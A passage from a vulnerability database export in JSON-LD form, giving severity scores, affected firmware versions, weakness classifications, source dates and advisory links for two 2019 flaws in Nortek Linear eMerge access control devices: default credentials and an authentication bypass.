            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7252",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34626",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158687",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7252",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7252",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34626",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-109",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158687",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices have Default Credentials. Linear eMerge E3 Series devices contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to obtain default passwords and identify target systems connected to the network. to attack affected components",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7252",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "id": "VAR-201907-0152",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:52:16.684000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge E3-Series Access Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-1188",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7252"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7252"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "date": "2019-07-02T19:15:10.867000",
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158687"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "date": "2020-08-24T17:37:01.140000",
            "db": "NVD",
            "id": "CVE-2019-7252"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nortek Security \u0026 Control Linear eMerge E3-Series Trust Management Issue Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-109"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0167

    Vulnerability from variot - Updated: 2023-12-18 13:23

    Linear eMerge 50P/5000P The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control.

    The Linear eMerge 50P / 5000P has an authentication bypass vulnerability. An attacker could exploit this vulnerability by sending a specially crafted HTTP request to bypass authentication checks and gain unauthorized access to the application. A security vulnerability exists in the Linear eMerge 50P/5000P device due to the validation mechanism not adequately checking the incoming data

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0167",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security \u0026 control linear emerge 50p 5000p version)",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "/\u003c=4.6.07(79330"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sipke Mellema",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7266",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7266",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34617",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158701",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7266",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7266",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34617",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-097",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158701",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. \n\nThe Linear eMerge 50P / 5000P has an authentication bypass vulnerability. An attacker could exploit this vulnerability by sending a specially crafted HTTP request to bypass authentication checks and gain unauthorized access to the application. A security vulnerability exists in the Linear eMerge 50P/5000P device due to the validation mechanism not adequately checking the incoming data",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          }
        ],
        "trust": 1.35
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-158701",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7266",
            "trust": 3.1
          },
          {
            "db": "PACKETSTORM",
            "id": "155250",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-184-01",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2294",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47293",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
      "id": "VAR-201907-0167",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:23:40.601000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-565",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-287",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7266"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.7,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7266"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47293"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
